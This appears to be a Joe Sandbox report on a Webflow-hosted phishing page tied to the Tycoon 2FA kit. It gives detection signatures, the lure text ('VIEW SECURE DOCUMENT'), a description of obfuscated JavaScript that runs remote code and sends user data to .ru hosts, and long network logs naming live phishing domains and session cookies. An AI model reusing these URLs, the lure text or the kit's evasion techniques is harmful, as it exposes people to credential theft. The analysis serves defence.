Edit tour

Windows Analysis Report
https://littlestownseniorhighschool.webflow.io/

Overview

General Information

Sample URL:https://littlestownseniorhighschool.webflow.io/
Analysis ID:1651125
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish44
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 2744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2576,i,238525167681460180,11121848182826903600,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2632 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6948 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://littlestownseniorhighschool.webflow.io/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_64JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    1.5.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      1.5.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
        1.3.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          1.6.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
            1.3.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
              Click to see the 4 entries
              No Sigma rule has matched
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: https://fgof.koxicarev.ru/favicon.icoAvira URL Cloud: Label: phishing

              Phishing

              barindex
              Source: Yara matchFile source: dropped/chromecache_64, type: DROPPED
              Source: Yara matchFile source: 1.3.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: Yara matchFile source: 1.1.pages.csv, type: HTML
              Source: Yara matchFile source: 1.3.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.6.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.2.pages.csv, type: HTML
              Source: Yara matchFile source: 1.1.pages.csv, type: HTML
              Source: Yara matchFile source: 1.5.d.script.csv, type: HTML
              Source: https://littlestownseniorhighschool.webflow.io/Joe Sandbox AI: Page contains button: 'VIEW SECURE DOCUMENT' Source: '0.0.pages.csv'
              Source: 1.4..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://fgof.koxicarev.ru/zXMKsj/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob` and `decodeURIComponent` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending user data to an untrusted domain, which poses a significant risk of data theft or other malicious activities. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
              Source: Chrome DOM: 0.0OCR Text: New Document Received You'Ve received (2) new PDF Documents for your review Please sign & return VIEW SECURE DOCUMENT Made in Webflow
              Source: https://fgof.koxicarev.ru/zXMKsj/HTTP Parser: No favicon
              Source: https://fgof.koxicarev.ru/zXMKsj/HTTP Parser: No favicon
              Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.36.248:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.36.248:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.160.117:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.160.117:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.68:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.68:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.68:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.210:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.210:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.161.117:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.212:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.212:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.206:443 -> 192.168.2.4:49759 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.148.100:443 -> 192.168.2.4:49760 version: TLS 1.2
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
              Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
              Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.195
              Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.195
              Source: unknownTCP traffic detected without corresponding DNS query: 23.57.90.137
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: littlestownseniorhighschool.webflow.ioConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.7e3e20a4b.css HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /67e2c79fd85ebcb1b252e594/js/webflow.751e0867.f68fe005672cde30.js HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e594 HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-aliveOrigin: https://littlestownseniorhighschool.webflow.iosec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /img/webflow-badge-icon-d2.89e12c322e.svg HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /img/webflow-badge-text-d2.c82cec3b78.svg HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /img/favicon.ico HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /img/webflow-badge-icon-d2.89e12c322e.svg HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /img/webflow-badge-text-d2.c82cec3b78.svg HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /img/favicon.ico HTTP/1.1Host: cdn.prod.website-files.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /zXMKsj/ HTTP/1.1Host: fgof.koxicarev.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://littlestownseniorhighschool.webflow.io/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: fgof.koxicarev.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fgof.koxicarev.ru/zXMKsj/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImhCLzAwMU1aWVgxU3VNTmFCaExpdGc9PSIsInZhbHVlIjoiWEV1UVB5REEzdEhSSXVOK0dzS3F3UHZITkdLNXg4YmtFZVMvVHNoTXZVb04reFJBck4velpFYVNGSlQ2V3lINXlHNU5hSG55cDRwYWs3cTQ4cDlvMkFHNFhuM3NVWlJWYktST2xXMzJMZUV2RFg3MEUwVFpRNzRQMjdQSmwrbDEiLCJtYWMiOiI3OTdjZWM2NTQ1YjhkNDFkOTczYjZkZjIzMGNjZjI0N2E2NzExMjA1OTU2NDQ3ZTkyYjM4NzYxYjQ3NWFiNmEyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFSc2k0WWtLU1kwRHppRHlWNFIydmc9PSIsInZhbHVlIjoiNmhoQVA5T1FhVzVjYTZMTnhQMHZjWHE0OGhKVVJYWXlVZW1IOXdvK2dBQ1ZZWlF2Q2RES1RubkR1TURFT2NrRWNhQW1zL3J4d3BGQVQ1OG84YnFtdXpXcDRFU2FNY3drUHNzOHc5MlIzaElNcmowZzY1OEQ4VWlONmoyMUtyL2MiLCJtYWMiOiI1ODgzYjFjNGRhMjVjMzMzNzBiOTNmYzg2MDgwMzRjYjM2Y2Y4MjdjMGIwN2IzMzdhODNhMWI3MGY3Y2NkYmE4IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /bhanchod@ac8zycz HTTP/1.1Host: i8yr.viugbu.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://fgof.koxicarev.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://fgof.koxicarev.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /bhanchod@ac8zycz HTTP/1.1Host: i8yr.viugbu.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /bhanchod@ac8zycz HTTP/1.1Host: i8yr.viugbu.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://fgof.koxicarev.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://fgof.koxicarev.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /bhanchod@ac8zycz HTTP/1.1Host: i8yr.viugbu.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: littlestownseniorhighschool.webflow.io
              Source: global trafficDNS traffic detected: DNS query: cdn.prod.website-files.com
              Source: global trafficDNS traffic detected: DNS query: d3e54v103j8qbb.cloudfront.net
              Source: global trafficDNS traffic detected: DNS query: fgof.koxicarev.ru
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: i8yr.viugbu.ru
              Source: unknownHTTP traffic detected: POST /report/v4?s=twTw6EGda%2FXPRdY1GyP9qd4lGK6UIWMPRHFAlUKwYFAjuQ%2FR3LfmBwXaYpfCVoUZ3kXUc%2FWoMbC73zxtlqrU5gICSDUlM9eIUvLgqPhuD0E1dkl5ey8TMKftd1Wx0A%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 431Content-Type: application/reports+jsonOrigin: https://fgof.koxicarev.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Mar 2025 12:43:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400cf-cache-status: HITReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=twTw6EGda%2FXPRdY1GyP9qd4lGK6UIWMPRHFAlUKwYFAjuQ%2FR3LfmBwXaYpfCVoUZ3kXUc%2FWoMbC73zxtlqrU5gICSDUlM9eIUvLgqPhuD0E1dkl5ey8TMKftd1Wx0A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=24410&min_rtt=10068&rtt_var=17927&sent=107&recv=49&lost=0&retrans=1&sent_bytes=113511&recv_bytes=6638&delivery_rate=1882865&cwnd=111&unsent_bytes=0&cid=7c5043c8bef34e9a&ts=458424&x=0"Age: 8640Server: cloudflareCF-RAY: 9277361d5f9a88c3-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=89802&min_rtt=89744&rtt_var=19020&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1899&delivery_rate=33991&cwnd=252&unsent_bytes=0&cid=33733f076881f93d&ts=1312&x=0"
              Source: chromecache_58.2.drString found in binary or memory: https://FgoF.koxicarev.ru/zXMKsj/
              Source: chromecache_58.2.drString found in binary or memory: https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/css/littlestownseniorhighschool.webflow.
              Source: chromecache_58.2.drString found in binary or memory: https://cdn.prod.website-files.com/67e2c79fd85ebcb1b252e594/js/webflow.751e0867.f68fe005672cde30.js
              Source: chromecache_58.2.drString found in binary or memory: https://cdn.prod.website-files.com/img/favicon.ico
              Source: chromecache_58.2.drString found in binary or memory: https://cdn.prod.website-files.com/img/webclip.png
              Source: chromecache_58.2.drString found in binary or memory: https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=67e2c79fd85ebcb1b252e59
              Source: chromecache_58.2.drString found in binary or memory: https://webflow.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.36.248:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.36.248:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.160.117:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.160.117:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.68:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.68:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.68:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.210:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.33.251.210:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.161.117:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.212:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.73.212:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.206:443 -> 192.168.2.4:49759 version: TLS 1.2
